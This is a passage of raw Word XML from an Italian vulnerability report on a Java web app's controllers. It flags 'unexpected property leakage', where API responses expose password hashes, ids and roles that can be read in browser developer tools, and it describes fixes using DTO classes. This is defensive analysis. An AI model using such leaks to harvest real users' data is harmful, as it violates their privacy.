                  <wp:posOffset>12700</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444E7F2A"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7</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2" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:1pt;width:441.6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g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pnc3c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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3F4588C9" w14:textId="444E7F2A"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>17</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: HobbyController.java non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A73190" w14:textId="24D201A4" w:rsidR="00467BBC" w:rsidRPr="00A83B5D" w:rsidRDefault="00467BBC" w:rsidP="00A83B5D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A83B5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property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00564748" w:rsidR="006F4082" w:rsidRDefault="006F4082" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tale vulnerabilità riguarda il metodo </w:t>
      </w:r>
      <w:r w:rsidR="00B04DA2" w:rsidRPr="006F4082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>getBusinessDetails()</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In particolare sono stati rimossi i campi id, password, roles e hobby_offers, dove il campo password contiene l’hash della password usata (Figura 2</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>).</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L’algoritmo di hash utilizzato è BCrypt che è attualmente difficile da attaccare ma in futuro tale algoritmo potrebbe risultare debole grazie all’utilizzo di unità di calcolo sempre più potenti. Inoltre, le informazioni sensibili possono essere usate per fare altri attacchi e sono un problema per la privacy. I campi superflui sono visibili dal Web developer tool di un browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E91835" w14:textId="71791AB6" w:rsidR="006F4082" w:rsidRPr="006F4082" w:rsidRDefault="006F4082" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E174258" w14:textId="7D6D5178" w:rsidR="00B04DA2" w:rsidRDefault="00B04DA2" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Per risolvere è stata introdotta una classe DTO dove sono presenti solo gli attributi necessari.</w:t>
      </w:r>
      <w:r w:rsidR="00872EF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF6513">
        <w:t xml:space="preserve">(Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="00777E6A">
        <w:t xml:space="preserve"> e 2</w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00AF6513">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46416358" w14:textId="6A3BB377" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251948032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50E466C3" wp14:editId="73800B31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>305435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7261640" cy="777240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="147796761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1640" cy="777240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703EBBC" w14:textId="5B2D0C3F" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEAD95F" w14:textId="4A7BE994" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2810F5E8" w14:textId="76D0F886" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251788288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="022DD45A" wp14:editId="49DB2A69">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>214630</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252A1223"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18</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3" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:16.9pt;width:504.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Y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jW9nMwpJik0/3sY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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="345C1A0D" w14:textId="252A1223"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18</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con vulnerabilità</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB676FA" w14:textId="5260EACA" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00872EF7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E52B125" w14:textId="1A52D563" w:rsidR="00B04DA2" w:rsidRDefault="00B04DA2" w:rsidP="002A0868">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB2EF5E" w14:textId="416665DC" w:rsidR="00B04DA2" w:rsidRDefault="00777E6A" w:rsidP="002A0868">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251949056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E055BCA" wp14:editId="2E13A98F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>147955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7019922" cy="875766"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="1142106886"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9922" cy="875766"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9A8860" w14:textId="2A029DA4" w:rsidR="002A0868" w:rsidRDefault="002A0868" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1D4433" w14:textId="7F31A10F"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5824584C"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19</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4"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RGgIAAEAEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L066t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9mt7O5xSSFLv7eB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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="44C468C3" w14:textId="5824584C"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19</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD17B76" w14:textId="6B9C6D76" w:rsidR="006F4082" w:rsidRDefault="006F4082" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFB821E" w14:textId="77777777" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F70085" w14:textId="77777777" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CBAD06" w14:textId="77777777" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3410DCF4" w14:textId="190AC3BD" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AB6984E" wp14:editId="4D03D9FD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-54102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571"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="64528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C624" w14:textId="4C2A97B4" w:rsidR="006F4082" w:rsidRDefault="006F4082" w:rsidP="002A0868">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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793B8B8D" w14:textId="45F2BFE9" w:rsidR="002A0868" w:rsidRPr="002A0868" w:rsidRDefault="00777E6A"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4C647BEB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>11176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264BE15B"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>20</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5" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:8.8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bGgIAAEA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b3k4nUwpJis0+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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="60886733" w14:textId="264BE15B"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>20</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: Schermata web con i campi non necessari</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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0F949B9F"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870E32">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>21</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46"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W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7m87uPYwpJis3uPk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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2D6B360D" w14:textId="0F949B9F"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>21</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3685ADB6" w14:textId="77777777" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00681873">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E15974E" w14:textId="77777777" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00681873">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2559D5" w14:textId="4165EBD8" w:rsidR="00B019CE" w:rsidRPr="00681873" w:rsidRDefault="00B019CE" w:rsidP="00681873">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Questa vulnerabilità riguarda il metodo </w:t>
      </w:r>
      <w:r w:rsidR="00B019CE" w:rsidRPr="00681873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>showUserDetail()</w:t>
      </w:r>
      <w:r w:rsidR="00B019CE">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00B019CE" w:rsidRPr="00681873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dove troviamo lo </w:t>
      </w:r>
      <w:r w:rsidR="00B019CE">
        <w:t xml:space="preserve">stesso problema delle </w:t>
      </w:r>
      <w:r>
        <w:t>vulnerabilità descritte sopra.Infatti,</w:t>
      </w:r>
      <w:r w:rsidR="00B019CE">
        <w:t xml:space="preserve"> ci sono </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nuovamente </w:t>
      </w:r>
      <w:r w:rsidR="00B019CE">
        <w:t>degli attributi superflui</w:t>
      </w:r>
      <w:r w:rsidR="00872EF7">
        <w:t xml:space="preserve"> e sono id, roles, password, testResults, hobby_matches e saved_hobbies.</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12EA156B" w14:textId="77777777" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00681873">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pP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5247161C"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2</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47"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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="46F743E7" w14:textId="5247161C"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2</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346EAD0D" w14:textId="77777777" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="15C272FA" w14:textId="77777777" w:rsidR="00777E6A" w:rsidRDefault="00777E6A" w:rsidP="00467BBC"/>
    <w:p w14:paraId="288BB1F2" w14:textId="60A5A2AE" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4D5ECAA5" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7031D6CE" w14:textId="77777777" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4A17FD67" w14:textId="4DA35649" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4A735AF0" w14:textId="18724E7E" w:rsidR="004B30FC" w:rsidRDefault="00681873" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>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070439B4"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3</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48"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It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w+DnmA8kKz&#10;I/Sy8E5uNTXcCR+eBJIOaCbSdnikozLQFhwGi7Ma8Mff/DGf6KEoZy3pquD++0mg4sx8tURcFOFo&#10;4GgcRsOemg3QqDPaGieTSRcwmNGsEJoXkvw6dqGQsJJ6FTyM5ib06qaVkWq9TkkkNSfCzu6djKVH&#10;YJ+7F4FuoCUQmw8wKk7kr9jpcxM/bn0KBHWiLgLbozjgTTJN5A8rFffg1/+UdVv81U8A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EsUi0aAgAAQAQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAL/cQkjfAAAACQEAAA8AAAAAAAAAAAAAAAAAdAQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAACABQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0B44FD21" w14:textId="070439B4"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3</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4D589BB0" w:rsidR="004B30FC" w:rsidRDefault="00777E6A" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251950080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A7B3433" wp14:editId="66564FF9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>309245</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7282122" cy="795654"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="33145106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2122" cy="795654"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00681873">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251802624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E43CE79" wp14:editId="40DE59F6">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23E82AC9"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4</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49"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q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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3F0B4B38" w14:textId="23E82AC9"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870E32">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>24</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC301E4" w14:textId="082D4FBC" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="064359E7" w14:textId="56EF81FB" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C35DEE0" w14:textId="2945222C" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="56C6D90C" w14:textId="2DD7B5C4" w:rsidR="004B30FC" w:rsidRDefault="00CD7B9B" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251951104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CE0607A" wp14:editId="708AEEC1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>343535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7236268" cy="922020"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="202912079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6268" cy="922020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00CA09AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251804672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1506CDD1" wp14:editId="234099B1">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3BE7C1C9"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2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0"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XR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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="59367F12" w14:textId="3BE7C1C9"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25</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="74433AFB" w14:textId="7982E6A8"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28F9E2C7" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="00467BBC"/>
    <w:p w14:paraId="20C2A7AD" w14:textId="77777777" w:rsidR="007239A2" w:rsidRPr="0006778F" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Unexpected property leakage 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A75669" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HobbyController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAAEDAF" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>: 122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D2FDD" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F13B511" w14:textId="0703FC85" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In questo caso, il metodo in analisi è il metodo </w:t>
      </w:r>
      <w:r w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saved()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="005E267F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HobbyController.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e risulta un </w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> positive perché </w:t>
      </w:r>
      <w:r>
        <w:t>ci sono degli attributi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dell’oggetto </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che non </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vengono utilizzati, come mostrato nella schermata web developer in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00015CE5">
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F932F9" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372531AE" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Anche in questo caso consiste nel leggere i valori dal Web developer tool, in modo da violare la privacy dell’utente o effettuare altri attacchi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EFB508" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18306E03" w14:textId="4DA96C64" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Sono stati rimossi gli attributi superflui tramite l’uso di una classe DTO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62165312" w14:textId="77777777" w:rsidR="007239A2" w:rsidRDefault="007239A2" w:rsidP="007239A2">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
